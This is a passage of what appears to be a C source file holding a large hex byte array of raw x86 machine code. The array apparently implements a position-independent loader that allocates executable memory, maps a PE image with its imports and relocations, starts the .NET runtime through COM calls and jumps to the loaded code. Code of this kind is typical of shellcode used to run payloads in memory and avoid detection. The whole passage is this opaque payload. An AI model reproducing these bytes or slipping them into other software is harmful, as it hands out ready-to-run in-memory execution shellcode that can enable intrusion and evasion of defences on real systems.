346 0x72, 0xed, 0x77, 0x08, 0x3b, 0x8d, 0x10, 0x19, 0x00, 0x00, 0x72, 0xe3,
347 0x8b, 0x5c, 0x24, 0x28, 0x8b, 0x4e, 0x10, 0x8d, 0x46, 0x14, 0x50, 0x57,
348 0x51, 0x8b, 0x11, 0xff, 0x92, 0xb4, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x1b,
349 0xc0, 0x33, 0xd2, 0x40, 0x8b, 0xca, 0x89, 0x44, 0x24, 0x10, 0x8b, 0x47,
350 0x0c, 0x39, 0x95, 0x14, 0x19, 0x00, 0x00, 0x72, 0x27, 0x77, 0x08, 0x39,
351 0x95, 0x10, 0x19, 0x00, 0x00, 0x76, 0x1d, 0x88, 0x94, 0x29, 0x18, 0x19,
352 0x00, 0x00, 0x88, 0x14, 0x08, 0x41, 0x3b, 0x95, 0x14, 0x19, 0x00, 0x00,
353 0x72, 0xed, 0x77, 0x08, 0x3b, 0x8d, 0x10, 0x19, 0x00, 0x00, 0x72, 0xe3,
354 0x57, 0xff, 0x53, 0x64, 0x8b, 0x44, 0x24, 0x10, 0x5f, 0x5e, 0x5d, 0x5b,
355 0x83, 0xc4, 0x14, 0xc3, 0x83, 0x27, 0x00, 0xe9, 0xcc, 0xfe, 0xff, 0xff,
356 0x89, 0x3e, 0xe9, 0xc7, 0xfe, 0xff, 0xff, 0x33, 0xff, 0x8d, 0x46, 0x08,
357 0x50, 0x8d, 0x83, 0x5c, 0x04, 0x00, 0x00, 0x50, 0x8d, 0x83, 0x4c, 0x04,
358 0x00, 0x00, 0x50, 0x57, 0x57, 0xff, 0x93, 0xa0, 0x00, 0x00, 0x00, 0x85,
359 0xc0, 0x0f, 0x89, 0xab, 0xfe, 0xff, 0xff, 0x89, 0x7e, 0x08, 0x33, 0xc0,
360 0xeb, 0xbe, 0x83, 0xec, 0x6c, 0x53, 0x8b, 0x5c, 0x24, 0x74, 0x33, 0xc0,
361 0x55, 0x56, 0x57, 0x8d, 0x7c, 0x24, 0x3c, 0x33, 0xed, 0x21, 0x6c, 0x24,
362 0x14, 0x8d, 0xb3, 0x48, 0x07, 0x00, 0x00, 0xab, 0xab, 0xab, 0xab, 0x33,
363 0xc0, 0x66, 0x89, 0x44, 0x24, 0x10, 0x40, 0x39, 0x83, 0x0c, 0x05, 0x00,
364 0x00, 0x74, 0x02, 0x8b, 0x36, 0x83, 0x3e, 0x02, 0x0f, 0x85, 0x64, 0x01,
365 0x00, 0x00, 0x8b, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x8b, 0x48, 0x14,
366 0x8d, 0x78, 0x1c, 0x57, 0x51, 0x8b, 0x01, 0xff, 0x50, 0x40, 0x85, 0xc0,
367 0x0f, 0x88, 0x41, 0x01, 0x00, 0x00, 0x8b, 0x07, 0x8d, 0x54, 0x24, 0x14,
368 0x52, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x48, 0x85, 0xc0, 0x0f, 0x88, 0x4e,
369 0x02, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x6a, 0x01, 0xff, 0x74,
370 0x24, 0x1c, 0xff, 0x53, 0x68, 0x8d, 0x44, 0x24, 0x20, 0x50, 0x6a, 0x01,
371 0xff, 0x74, 0x24, 0x1c, 0xff, 0x53, 0x6c, 0x8b, 0x44, 0x24, 0x20, 0x2b,
372 0x44, 0x24, 0x24, 0x83, 0xc0, 0x01, 0x0f, 0x84, 0xbc, 0x00, 0x00, 0x00,
373 0x6a, 0x01, 0x6a, 0x00, 0x6a, 0x0c, 0xff, 0x53, 0x5c, 0x8b, 0xe8, 0x33,
374 0xc9, 0x39, 0x8e, 0x04, 0x08, 0x00, 0x00, 0xb8, 0x08, 0x20, 0x00, 0x00,
375 0x66, 0x89, 0x44, 0x24, 0x2c, 0x74, 0x58, 0xff, 0xb6, 0x04, 0x08, 0x00,
376 0x00, 0x51, 0x6a, 0x08, 0xff, 0x53, 0x5c, 0x89, 0x44, 0x24, 0x34, 0x33,
377 0xc0, 0x89, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, 0x39, 0x86, 0x04, 0x08,
378 0x00, 0x00, 0x76, 0x63, 0xc1, 0xe0, 0x09, 0x05, 0x08, 0x08, 0x00, 0x00,
379 0x03, 0xc6, 0x50, 0xff, 0x53, 0x70, 0x50, 0x8d, 0x84, 0x24, 0x84, 0x00,
380 0x00, 0x00, 0x50, 0xff, 0x74, 0x24, 0x3c, 0xff, 0x53, 0x60, 0x8b, 0x84,
381 0x24, 0x80, 0x00, 0x00, 0x00, 0x40, 0x89, 0x84, 0x24, 0x80, 0x00, 0x00,
382 0x00, 0x3b, 0x86, 0x04, 0x08, 0x00, 0x00, 0x72, 0xcb, 0xeb, 0x2c, 0x6a,
383 0x01, 0x51, 0x6a, 0x08, 0xff, 0x53, 0x5c, 0x83, 0xa4, 0x24, 0x80, 0x00,
384 0x00, 0x00, 0x00, 0x89, 0x44, 0x24, 0x34, 0x8d, 0x44, 0x24, 0x10, 0x50,
385 0xff, 0x53, 0x70, 0x50, 0x8d, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x50,
386 0xff, 0x74, 0x24, 0x3c, 0xff, 0x53, 0x60, 0x83, 0xa4, 0x24, 0x80, 0x00,
387 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x2c, 0x50, 0x8d, 0x84, 0x24, 0x84,
388 0x00, 0x00, 0x00, 0x50, 0x55, 0xff, 0x53, 0x60, 0x83, 0x64, 0x24, 0x44,
389 0x00, 0x8d, 0x54, 0x24, 0x5c, 0x52, 0x33, 0xc0, 0x8d, 0x74, 0x24, 0x40,
390 0x40, 0x66, 0x89, 0x44, 0x24, 0x40, 0x8b, 0x07, 0x55, 0x83, 0xec, 0x10,
391 0x8b, 0xfc, 0x8b, 0x08, 0x50, 0xa5, 0xa5, 0xa5, 0xa5, 0xff, 0x91, 0x94,
392 0x00, 0x00, 0x00, 0x85, 0xed, 0x0f, 0x84, 0x32, 0x01, 0x00, 0x00, 0xff,
393 0x74, 0x24, 0x34, 0xff, 0x53, 0x64, 0x55, 0xff, 0x53, 0x64, 0xe9, 0x22,
394 0x01, 0x00, 0x00, 0x21, 0x2f, 0xe9, 0x1b, 0x01, 0x00, 0x00, 0x8d, 0x86,
395 0x04, 0x04, 0x00, 0x00, 0x50, 0xff, 0x53, 0x70, 0x8b, 0xe8, 0x89, 0x6c,
396 0x24, 0x18, 0x85, 0xed, 0x0f, 0x84, 0x06, 0x01, 0x00, 0x00, 0x8d, 0x86,
397 0x04, 0x06, 0x00, 0x00, 0x50, 0xff, 0x53, 0x70, 0x89, 0x44, 0x24, 0x1c,
398 0x85, 0xc0, 0x0f, 0x84, 0xe9, 0x00, 0x00, 0x00, 0x8b, 0x8c, 0x24, 0x84,
399 0x00, 0x00, 0x00, 0x8b, 0x51, 0x14, 0x8d, 0x41, 0x18, 0x50, 0x55, 0x52,
400 0x8b, 0x0a, 0x89, 0x44, 0x24, 0x34, 0xff, 0x51, 0x44, 0x8b, 0xf8, 0x85,
401 0xff, 0x0f, 0x88, 0xbe, 0x00, 0x00, 0x00, 0x8b, 0x86, 0x04, 0x08, 0x00,
402 0x00, 0x33, 0xed, 0x85, 0xc0, 0x74, 0x6e, 0x50, 0x55, 0x6a, 0x0c, 0xff,
403 0x53, 0x5c, 0x8b, 0xe8, 0x85, 0xed, 0x74, 0x61, 0x83, 0xa4, 0x24, 0x80,
404 0x00, 0x00, 0x00, 0x00, 0x83, 0xbe, 0x04, 0x08, 0x00, 0x00, 0x00, 0x76,
405 0x50, 0x33, 0xc0, 0xc1, 0xe0, 0x09, 0x05, 0x08, 0x08, 0x00, 0x00, 0x03,
406 0xc6, 0x50, 0xff, 0x53, 0x70, 0x6a, 0x08, 0x89, 0x44, 0x24, 0x58, 0x58,
407 0x66, 0x89, 0x44, 0x24, 0x4c, 0x8d, 0x44, 0x24, 0x4c, 0x50, 0x8d, 0x84,
408 0x24, 0x84, 0x00, 0x00, 0x00, 0x50, 0x55, 0xff, 0x53, 0x60, 0x8b, 0xf8,
409 0x85, 0xff, 0x79, 0x06, 0x55, 0xff, 0x53, 0x64, 0x33, 0xed, 0x8b, 0x84,
410 0x24, 0x80, 0x00, 0x00, 0x00, 0x40, 0x89, 0x84, 0x24, 0x80, 0x00, 0x00,
411 0x00, 0x3b, 0x86, 0x04, 0x08, 0x00, 0x00, 0x72, 0xb2, 0x85, 0xff, 0x78,
412 0x3c, 0x8b, 0x44, 0x24, 0x28, 0x8d, 0x54, 0x24, 0x6c, 0x52, 0x55, 0x83,
413 0xec, 0x10, 0x8d, 0x74, 0x24, 0x54, 0x8b, 0x00, 0x8b, 0xfc, 0x6a, 0x00,
414 0x8b, 0x08, 0xa5, 0x68, 0x18, 0x01, 0x00, 0x00, 0xa5, 0xa5, 0xa5, 0x8b,
415 0x74, 0x24, 0x3c, 0x56, 0x50, 0xff, 0x91, 0xe4, 0x00, 0x00, 0x00, 0x85,
416 0xed, 0x74, 0x04, 0x55, 0xff, 0x53, 0x64, 0x8b, 0x6c, 0x24, 0x18, 0xeb,
417 0x08, 0x8b, 0x6c, 0x24, 0x18, 0x8b, 0x74, 0x24, 0x1c, 0x56, 0xff, 0x53,
418 0x74, 0x55, 0xff, 0x53, 0x74, 0x33, 0xc0, 0x40, 0x5f, 0x5e, 0x5d, 0x5b,
419 0x83, 0xc4, 0x6c, 0xc3, 0x81, 0xec, 0xdc, 0x00, 0x00, 0x00, 0xb8, 0x01,
420 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x31, 0xc0, 0x48, 0x79, 0x53,
421 0x55, 0x8b, 0xac, 0x24, 0xe8, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24, 0x4c,
422 0x89, 0x44, 0x24, 0x54, 0x89, 0x44, 0x24, 0x5c, 0x83, 0xbd, 0x0c, 0x05,
423 0x00, 0x00, 0x01, 0x89, 0x44, 0x24, 0x64, 0x89, 0x44, 0x24, 0x6c, 0x89,
424 0x84, 0x24, 0xa8, 0x00, 0x00, 0x00, 0x89, 0x84, 0x24, 0xc0, 0x00, 0x00,
425 0x00, 0x89, 0x84, 0x24, 0xc8, 0x00, 0x00, 0x00, 0x89, 0x84, 0x24, 0xd0,
426 0x00, 0x00, 0x00, 0x89, 0x84, 0x24, 0xd8, 0x00, 0x00, 0x00, 0x8d, 0x85,
427 0x48, 0x07, 0x00, 0x00, 0x57, 0xc7, 0x44, 0x24, 0x30, 0x1b, 0x8b, 0x44,
428 0x24, 0xc7, 0x44, 0x24, 0x34, 0x04, 0x8b, 0x4c, 0x24, 0xc7, 0x44, 0x24,
429 0x38, 0x08, 0x8b, 0x54, 0x24, 0xc7, 0x44, 0x24, 0x3c, 0x0c, 0x52, 0x81,
430 0xc2, 0xc7, 0x44, 0x24, 0x40, 0x00, 0x02, 0x00, 0x00, 0xc7, 0x44, 0x24,
431 0x44, 0x83, 0xe9, 0x01, 0x75, 0xc7, 0x44, 0x24, 0x48, 0xf4, 0xff, 0xd0,
432 0xc3, 0xc7, 0x44, 0x24, 0x4c, 0x48, 0x81, 0xec, 0x48, 0xc7, 0x44, 0x24,
433 0x54, 0x89, 0xac, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x5c, 0x89, 0x9c, 0x24,
434 0x38, 0xc7, 0x44, 0x24, 0x64, 0x89, 0xbc, 0x24, 0x20, 0xc7, 0x44, 0x24,
435 0x6c, 0x89, 0xb4, 0x24, 0x28, 0xc7, 0x44, 0x24, 0x74, 0x89, 0xe6, 0x48,
436 0x89, 0xc7, 0x44, 0x24, 0x78, 0xcf, 0xb8, 0x00, 0x02, 0xc7, 0x44, 0x24,
437 0x7c, 0x00, 0x00, 0x4c, 0x89, 0xc7, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00,
438 0xc1, 0x48, 0x8d, 0x14, 0xc7, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x01,
439 0x4c, 0x8d, 0x04, 0xc7, 0x84, 0x24, 0x88, 0x00, 0x00, 0x00, 0x02, 0x4d,
440 0x8d, 0x0c, 0xc7, 0x84, 0x24, 0x8c, 0x00, 0x00, 0x00, 0x00, 0x49, 0x8d,
441 0x1c, 0xc7, 0x84, 0x24, 0x90, 0x00, 0x00, 0x00, 0x01, 0x48, 0x89, 0x9c,
442 0xc7, 0x84, 0x24, 0x94, 0x00, 0x00, 0x00, 0x24, 0x00, 0x01, 0x00, 0xc7,
443 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x00, 0x48, 0x01, 0xc3, 0xc7, 0x84,
444 0x24, 0x9c, 0x00, 0x00, 0x00, 0x48, 0x89, 0x9c, 0x24, 0xc7, 0x84, 0x24,
445 0xa0, 0x00, 0x00, 0x00, 0x08, 0x01, 0x00, 0x00, 0xc7, 0x84, 0x24, 0xa4,
446 0x00, 0x00, 0x00, 0x48, 0x01, 0xc3, 0x48, 0xc7, 0x84, 0x24, 0xa8, 0x00,
447 0x00, 0x00, 0x89, 0x9c, 0x24, 0x10, 0xc7, 0x84, 0x24, 0xb0, 0x00, 0x00,
448 0x00, 0x01, 0xc3, 0x48, 0x89, 0xc7, 0x84, 0x24, 0xb4, 0x00, 0x00, 0x00,
449 0x9c, 0x24, 0x18, 0x01, 0xc7, 0x84, 0x24, 0xb8, 0x00, 0x00, 0x00, 0x00,
450 0x00, 0xff, 0xd7, 0xc7, 0x84, 0x24, 0xbc, 0x00, 0x00, 0x00, 0x48, 0x89,
451 0xf4, 0x48, 0xc7, 0x84, 0x24, 0xc0, 0x00, 0x00, 0x00, 0x8b, 0xb4, 0x24,
452 0x28, 0xc7, 0x84, 0x24, 0xc8, 0x00, 0x00, 0x00, 0x8b, 0xbc, 0x24, 0x20,
453 0xc7, 0x84, 0x24, 0xd0, 0x00, 0x00, 0x00, 0x8b, 0x9c, 0x24, 0x38, 0xc7,
454 0x84, 0x24, 0xd8, 0x00, 0x00, 0x00, 0x8b, 0xac, 0x24, 0x30, 0xc7, 0x84,
455 0x24, 0xe0, 0x00, 0x00, 0x00, 0x81, 0xc4, 0x48, 0x01, 0xc7, 0x84, 0x24,
456 0xe4, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc3, 0x00, 0x89, 0x44, 0x24, 0x14,
457 0x74, 0x06, 0x8b, 0x00, 0x89, 0x44, 0x24, 0x14, 0x8b, 0xb8, 0x54, 0x19,
458 0x00, 0x00, 0x05, 0x18, 0x19, 0x00, 0x00, 0x03, 0xf8, 0x89, 0x44, 0x24,
459 0x10, 0x33, 0xdb, 0x89, 0x7c, 0x24, 0x18, 0x53, 0xff, 0x55, 0x38, 0x66,
460 0x8b, 0x4f, 0x04, 0x89, 0x44, 0x24, 0x28, 0x8b, 0x50, 0x3c, 0x66, 0x3b,
461 0x4c, 0x02, 0x04, 0x0f, 0x85, 0x80, 0x02, 0x00, 0x00, 0x56, 0x6a, 0x40,
462 0xb8, 0x00, 0x30, 0x00, 0x00, 0xb9, 0x00, 0x10, 0x00, 0x00, 0x50, 0x89,
463 0x44, 0x24, 0x28, 0x8b, 0x47, 0x50, 0x03, 0xc1, 0x50, 0x53, 0xff, 0x55,
464 0x3c, 0x8b, 0xf0, 0x85, 0xf6, 0x0f, 0x84, 0x59, 0x02, 0x00, 0x00, 0x0f,
465 0xb7, 0x5f, 0x14, 0x33, 0xc0, 0x83, 0x64, 0x24, 0x10, 0x00, 0x83, 0xc3,
466 0x2c, 0x66, 0x3b, 0x47, 0x06, 0x73, 0x37, 0x8b, 0x6c, 0x24, 0x14, 0x03,
467 0xdf, 0xff, 0x73, 0xfc, 0x8b, 0x03, 0x03, 0xc5, 0x50, 0x8b, 0x43, 0xf8,
468 0x03, 0xc6, 0x50, 0xe8, 0xa1, 0x07, 0x00, 0x00, 0x8b, 0x4c, 0x24, 0x1c,
469 0x8d, 0x5b, 0x28, 0x0f, 0xb7, 0x47, 0x06, 0x83, 0xc4, 0x0c, 0x41, 0x89,
470 0x4c, 0x24, 0x10, 0x3b, 0xc8, 0x72, 0xd6, 0x8b, 0xac, 0x24, 0xf0, 0x00,
471 0x00, 0x00, 0x8b, 0x9f, 0x80, 0x00, 0x00, 0x00, 0x03, 0xde, 0x89, 0x5c,
472 0x24, 0x14, 0x8b, 0x43, 0x0c, 0x85, 0xc0, 0x74, 0x68, 0x03, 0xc6, 0x50,
473 0xff, 0x55, 0x30, 0x8b, 0x53, 0x10, 0x89, 0x44, 0x24, 0x28, 0x03, 0xd6,
474 0x8b, 0x03, 0x03, 0xc6, 0x89, 0x54, 0x24, 0x24, 0x89, 0x44, 0x24, 0x10,
475 0x8b, 0x08, 0x85, 0xc9, 0x74, 0x35, 0x8b, 0x5c, 0x24, 0x28, 0x8b, 0xfa,
476 0x8b, 0x55, 0x34, 0x85, 0xc9, 0x79, 0x05, 0x0f, 0xb7, 0xc1, 0xeb, 0x05,
477 0x8d, 0x46, 0x02, 0x03, 0xc1, 0x50, 0x53, 0xff, 0xd2, 0x89, 0x07, 0x83,
478 0xc7, 0x04, 0x8b, 0x44, 0x24, 0x10, 0x83, 0xc0, 0x04, 0x89, 0x44, 0x24,
479 0x10, 0x8b, 0x08, 0x85, 0xc9, 0x75, 0xd5, 0x8b, 0x5c, 0x24, 0x14, 0x8b,
480 0x43, 0x20, 0x83, 0xc3, 0x14, 0x89, 0x5c, 0x24, 0x14, 0x85, 0xc0, 0x75,
481 0x9c, 0x8b, 0x7c, 0x24, 0x1c, 0x8b, 0x9f, 0xa0, 0x00, 0x00, 0x00, 0x8b,
482 0xc6, 0x2b, 0x47, 0x34, 0x03, 0xde, 0x33, 0xc9, 0x89, 0x44, 0x24, 0x1c,
483 0x39, 0x0b, 0x74, 0x64, 0x8d, 0x4b, 0x08, 0xeb, 0x49, 0x0f, 0xb7, 0x01,
484 0x8b, 0xd0, 0x25, 0x00, 0xf0, 0x00, 0x00, 0x89, 0x54, 0x24, 0x10, 0x66,
485 0x3b, 0x44, 0x24, 0x20, 0x75, 0x23, 0x8b, 0xc2, 0x25, 0xff, 0x0f, 0x00,
486 0x00, 0x89, 0x44, 0x24, 0x10, 0x03, 0x03, 0x8b, 0x0c, 0x30, 0x03, 0x4c,
487 0x24, 0x1c, 0x8b, 0x44, 0x24, 0x10, 0x03, 0x03, 0x89, 0x0c, 0x30, 0x8b,
488 0x4c, 0x24, 0x14, 0xeb, 0x0e, 0xb8, 0x00, 0x10, 0x00, 0x00, 0x66, 0x3b,
489 0xd0, 0x0f, 0x83, 0x25, 0x01, 0x00, 0x00, 0x83, 0xc1, 0x02, 0x8b, 0x43,
490 0x04, 0x03, 0xc3, 0x89, 0x4c, 0x24, 0x14, 0x3b, 0xc8, 0x75, 0xaa, 0x83,
491 0x39, 0x00, 0x8b, 0xd9, 0x75, 0x9e, 0x33, 0xc9, 0x8b, 0x5c, 0x24, 0x18,
492 0x83, 0x3b, 0x03, 0x0f, 0x85, 0xf8, 0x00, 0x00, 0x00, 0x8d, 0x93, 0x04,
493 0x06, 0x00, 0x00, 0x66, 0x39, 0x0a, 0x0f, 0x84, 0xd9, 0x00, 0x00, 0x00,
494 0x8b, 0x4f, 0x78, 0x85, 0xc9, 0x0f, 0x84, 0xe5, 0x00, 0x00, 0x00, 0x8b,
495 0x7c, 0x31, 0x18, 0x85, 0xff, 0x0f, 0x84, 0xd9, 0x00, 0x00, 0x00, 0x8b,
496 0x44, 0x31, 0x1c, 0x03, 0xc6, 0x89, 0x44, 0x24, 0x1c, 0x8b, 0x44, 0x31,
497 0x20, 0x8b, 0x4c, 0x31, 0x24, 0x03, 0xc6, 0x03, 0xce, 0x89, 0x4c, 0x24,
498 0x20, 0x8d, 0x04, 0xb8, 0x83, 0xc0, 0xfc, 0x89, 0x44, 0x24, 0x18, 0x8b,
499 0x00, 0x52, 0x03, 0xc6, 0x50, 0xe8, 0xd8, 0x03, 0x00, 0x00, 0x59, 0x59,
500 0x85, 0xc0, 0x74, 0x1c, 0x8b, 0x44, 0x24, 0x18, 0x83, 0xe8, 0x04, 0x89,
501 0x44, 0x24, 0x18, 0x83, 0xef, 0x01, 0x0f, 0x84, 0x90, 0x00, 0x00, 0x00,
502 0x8d, 0x93, 0x04, 0x06, 0x00, 0x00, 0xeb, 0xd3, 0x8b, 0x44, 0x24, 0x20,
503 0x8b, 0x4c, 0x24, 0x1c, 0x0f, 0xb7, 0x44, 0x78, 0xfe, 0x8b, 0x04, 0x81,
504 0x03, 0xc6, 0x89, 0x44, 0x24, 0x20, 0x74, 0x70, 0x6a, 0x40, 0xb8, 0x00,
505 0x30, 0x00, 0x00, 0x50, 0x68, 0xbc, 0x00, 0x00, 0x00, 0x33, 0xc0, 0x50,
506 0xff, 0x55, 0x3c, 0x8b, 0xf8, 0x85, 0xff, 0x74, 0x57, 0x68, 0xbc, 0x00,
507 0x00, 0x00, 0x8d, 0x44, 0x24, 0x34, 0x50, 0x57, 0xe8, 0xc8, 0x05, 0x00,
508 0x00, 0x8d, 0x83, 0x08, 0x08, 0x00, 0x00, 0x50, 0xff, 0xb3, 0x04, 0x08,
509 0x00, 0x00, 0xff, 0x74, 0x24, 0x34, 0xff, 0xd7, 0x68, 0xbc, 0x00, 0x00,
510 0x00, 0x33, 0xdb, 0x53, 0x57, 0xe8, 0xcb, 0x05, 0x00, 0x00, 0x83, 0xc4,
511 0x24, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x53, 0x57, 0xff, 0x55, 0x40, 0xeb,
512 0x17, 0x8b, 0x47, 0x28, 0x51, 0x6a, 0x01, 0xff, 0x74, 0x24, 0x34, 0x03,
513 0xc6, 0xff, 0xd0, 0xeb, 0x07, 0x8b, 0x47, 0x28, 0x03, 0xc6, 0xff, 0xd0,
514 0x68, 0x00, 0xc0, 0x00, 0x00, 0x33, 0xc0, 0x50, 0x56, 0xff, 0x55, 0x40,
515 0x5e, 0x5f, 0x5d, 0x5b, 0x81, 0xc4, 0xdc, 0x00, 0x00, 0x00, 0xc3, 0x81,
516 0xec, 0xd8, 0x00, 0x00, 0x00, 0x53, 0x8b, 0x9c, 0x24, 0xe0, 0x00, 0x00,
517 0x00, 0x55, 0x56, 0x57, 0x83, 0xbb, 0x0c, 0x05, 0x00, 0x00, 0x01, 0x8d,
518 0xb3, 0x48, 0x07, 0x00, 0x00, 0x74, 0x02, 0x8b, 0x36, 0x8b, 0x83, 0x40,
519 0x07, 0x00, 0x00, 0x33, 0xff, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00,
520 0x8d, 0x04, 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x57, 0xff, 0x53, 0x3c,
521 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0x3f, 0x01, 0x00, 0x00, 0x8b, 0x8e,
522 0x10, 0x19, 0x00, 0x00, 0x03, 0xc9, 0x51, 0x55, 0x6a, 0xff, 0x8d, 0x8e,
523 0x18, 0x19, 0x00, 0x00, 0x51, 0x57, 0x57, 0xff, 0x53, 0x50, 0x8d, 0x44,
524 0x24, 0x44, 0x89, 0x44, 0x24, 0x18, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x53,
525 0xe8, 0x4c, 0xea, 0xff, 0xff, 0x8d, 0x44, 0x24, 0x78, 0x89, 0x44, 0x24,
526 0x2c, 0x8d, 0x44, 0x24, 0x2c, 0x50, 0x53, 0xe8, 0xfe, 0xf2, 0xff, 0xff,
527 0x83, 0xc4, 0x10, 0x89, 0x7c, 0x24, 0x20, 0x57, 0x57, 0xff, 0x93, 0xa8,
528 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xc8, 0x00, 0x00, 0x00, 0x8d,
529 0x44, 0x24, 0x10, 0x50, 0x8d, 0x83, 0x9c, 0x04, 0x00, 0x00, 0x50, 0x6a,
530 0x03, 0x57, 0x8d, 0x83, 0x7c, 0x04, 0x00, 0x00, 0x50, 0xff, 0x93, 0xac,
531 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xa4, 0x00, 0x00, 0x00, 0x8b,
532 0x4c, 0x24, 0x10, 0x8d, 0x44, 0x24, 0x14, 0x50, 0x8d, 0x83, 0xbc, 0x04,
533 0x00, 0x00, 0x50, 0x8b, 0x11, 0x51, 0xff, 0x12, 0x85, 0xc0, 0x75, 0x77,
534 0x8b, 0x44, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x0c, 0x85, 0xc0,
535 0x75, 0x5f, 0x8b, 0x4c, 0x24, 0x10, 0x8d, 0x54, 0x24, 0x18, 0x89, 0x4c,
536 0x24, 0x30, 0x52, 0x51, 0x8b, 0x01, 0xff, 0x50, 0x0c, 0x85, 0xc0, 0x75,
537 0x48, 0x8d, 0x83, 0xcc, 0x03, 0x00, 0x00, 0x50, 0xff, 0x53, 0x70, 0x8b,
538 0x4c, 0x24, 0x10, 0x8b, 0xf8, 0x6a, 0x02, 0x57, 0x51, 0x8b, 0x11, 0xff,
539 0x52, 0x20, 0x57, 0x8b, 0xf0, 0xff, 0x53, 0x74, 0x33, 0xff, 0x85, 0xf6,
540 0x75, 0x23, 0x8b, 0x44, 0x24, 0x14, 0x57, 0x57, 0x57, 0x8b, 0x08, 0x57,
541 0x57, 0x57, 0x57, 0x57, 0x55, 0x50, 0xff, 0x51, 0x14, 0x85, 0xc0, 0x75,
542 0x0c, 0x8b, 0x44, 0x24, 0x10, 0x6a, 0x02, 0x50, 0x8b, 0x08, 0xff, 0x51,
543 0x14, 0x8b, 0x44, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0x8b,
544 0x44, 0x24, 0x10, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x1c, 0x8b, 0x44, 0x24,
545 0x10, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0x8b, 0x83, 0x40, 0x07, 0x00,
546 0x00, 0x8d, 0x04, 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x57, 0x55, 0xe8,
547 0x15, 0x04, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x68, 0x00, 0xc0, 0x00, 0x00,
548 0x57, 0x55, 0xff, 0x53, 0x40, 0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0xd8,
549 0x00, 0x00, 0x00, 0xc3, 0x83, 0xec, 0x0c, 0x53, 0x55, 0x56, 0x8b, 0x74,
550 0x24, 0x1c, 0x57, 0x83, 0xbe, 0x0c, 0x05, 0x00, 0x00, 0x01, 0x8d, 0xbe,
551 0x48, 0x07, 0x00, 0x00, 0x74, 0x02, 0x8b, 0x3f, 0x8b, 0x86, 0x40, 0x07,
552 0x00, 0x00, 0x33, 0xed, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0x8d,
553 0x04, 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x55, 0xff, 0x56, 0x3c, 0x8b,
554 0xd8, 0x85, 0xdb, 0x0f, 0x84, 0xd1, 0x00, 0x00, 0x00, 0x8b, 0x8f, 0x10,
555 0x19, 0x00, 0x00, 0x03, 0xc9, 0x51, 0x53, 0x6a, 0xff, 0x8d, 0x8f, 0x18,
556 0x19, 0x00, 0x00, 0x51, 0x55, 0x55, 0xff, 0x56, 0x50, 0x55, 0x55, 0xff,
557 0x96, 0xa8, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0x87, 0x00, 0x00,
558 0x00, 0x8d, 0x44, 0x24, 0x10, 0x50, 0x8d, 0x86, 0xec, 0x04, 0x00, 0x00,
559 0x50, 0x6a, 0x01, 0x55, 0x8d, 0x86, 0xdc, 0x04, 0x00, 0x00, 0x50, 0xff,
560 0x96, 0xac, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x61, 0x8b, 0x44, 0x24,
561 0x10, 0x8d, 0x54, 0x24, 0x20, 0x52, 0x53, 0x50, 0x8b, 0x08, 0xff, 0x91,
562 0x04, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x40, 0x66, 0x39, 0x6c, 0x24,
563 0x20, 0x74, 0x39, 0x8b, 0x4c, 0x24, 0x10, 0x8d, 0x44, 0x24, 0x14, 0x50,
564 0x8d, 0x86, 0xfc, 0x04, 0x00, 0x00, 0x50, 0x8b, 0x11, 0x51, 0xff, 0x12,
565 0x85, 0xc0, 0x75, 0x20, 0x8b, 0x44, 0x24, 0x10, 0x8d, 0x54, 0x24, 0x18,
566 0x52, 0xff, 0x74, 0x24, 0x18, 0x8b, 0x08, 0x50, 0xff, 0x91, 0x8c, 0x00,
567 0x00, 0x00, 0x8b, 0x44, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08,
568 0x8b, 0x44, 0x24, 0x10, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0xff, 0x96,
569 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x86, 0x40, 0x07, 0x00, 0x00, 0x8d, 0x04,
570 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x55, 0x53, 0xe8, 0xf8, 0x02, 0x00,
571 0x00, 0x83, 0xc4, 0x0c, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x55, 0x53, 0xff,
572 0x56, 0x40, 0x5f, 0x5e, 0x5d, 0x5b, 0x83, 0xc4, 0x0c, 0xc3, 0x8b, 0x44,
573 0x24, 0x0c, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0x33, 0xc0, 0xc2, 0x10,
574 0x00, 0x8b, 0x44, 0x24, 0x04, 0x2b, 0x44, 0x24, 0x08, 0xc3, 0x8b, 0x44,
